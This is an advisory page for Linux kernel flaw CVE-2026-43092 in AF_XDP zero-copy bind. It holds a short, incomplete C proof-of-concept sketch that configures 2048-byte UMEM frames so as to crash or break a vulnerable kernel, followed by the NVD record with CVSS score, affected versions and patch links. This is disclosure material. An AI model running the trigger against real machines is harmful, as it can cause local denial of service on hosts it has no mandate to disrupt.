CVE-2026-43092

#include <linux/if_xdp.h> #include <bpf/xsk.h> // PoC Concept: Demonstrating the configuration that triggers the vulnerability // This requires a system with an AF_XDP compatible driver and vulnerable kernel. int main() { struct xsk_socket_config xsk_cfg; struct xsk_umem_config umem_cfg; struct xsk_socket *xsk; struct xsk_umem *umem; void *bufs; // 1. Setup UMEM with a small chunk size (e.g., 2048 bytes) umem_cfg.fill_size = XSK_RING_PROD__DEFAULT_NUM_DESCS; umem_cfg.comp_size = XSK_RING_CONS__DEFAULT_NUM_DESCS; umem_cfg.frame_size = 2048; // 2k chunk size umem_cfg.frame_headroom = 0; umem_cfg.flags = 0; // Allocate memory for UMEM (simplified) posix_memalign(&bufs, getpagesize(), NUM_FRAMES * 2048); // 2. Create UMEM xsk_umem__create(&umem, bufs, NUM_FRAMES * 2048, NULL, NULL, &umem_cfg); // 3. Configure Socket xsk_cfg.rx_size = XSK_RING_CONS__DEFAULT_NUM_DESCS; xsk_cfg.tx_size = XSK_RING_PROD__DEFAULT_NUM_DESCS; xsk_cfg.libxdp_flags = 0; xsk_cfg.xdp_flags = 0; xsk_cfg.bind_flags = XDP_ZEROCOPY; // Zero-copy mode is required // 4. Attempt to bind to an interface with standard MTU (e.g., 1500) // On a vulnerable kernel, this bind might succeed but fail during operation // or crash because 2048 - (headroom + tailroom + metadata) < 1500. int if_index = if_nametoindex("eth0"); xsk_socket__create(&xsk, "eth0", if_index, umem, NULL, NULL, &xsk_cfg); return 0; }

{"cve": {"id": "CVE-2026-43092", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T10:16:22.550", "lastModified": "2026-05-19T20:41:46.020", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nxsk: validate MTU against usable frame size on bind\n\nAF_XDP bind currently accepts zero-copy pool configurations without\nverifying that the device MTU fits into the usable frame space provided\nby the UMEM chunk.\n\nThis becomes a problem since we started to respect tailroom which is\nsubtracted from chunk_size (among with headroom). 2k chunk size might\nnot provide enough space for standard 1500 MTU, so let us catch such\nsettings at bind time. Furthermore, validate whether underlying HW will\nbe able to satisfy configured MTU wrt XSK's frame size multiplied by\nsupported Rx buffer chain length (that is exposed via\nnet_device::xdp_zc_max_segs)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.6", "versionEndExcluding": "6.6.136", "matchCriteriaId": "D1C8822E-08AF-49C3-8A31-F806E5FAE5E7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.83", "matchCriteriaId": "7F0AE5B5-23AC-4DCC-B37A-51CA1DAE7BA8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.24", "matchCriteriaId": "8126B8B8-6D0B-4443-86C1-672AEE893555"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.14", "matchCriteriaId": "D6A8A074-BBF4-4803-ABED-519A839435BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc7:*:*:*:*:*:*", "matchCriteriaId": "512EE3A8-A590-4501-9A94-5D4B268D6138"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/25e1e91a8da819924df0b16e3812d7b24c8ce133", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/36ee60b569ba0dfb6f961333b90d19ab5b323fa9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a55793e5a97d4e39bdb380873a9780fe0010bff6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b2f4daa6422fd6cc0cec969794dab4a88ea4cea1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f669d60db11dbabb96279f2b20f9d1cba43cddb2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}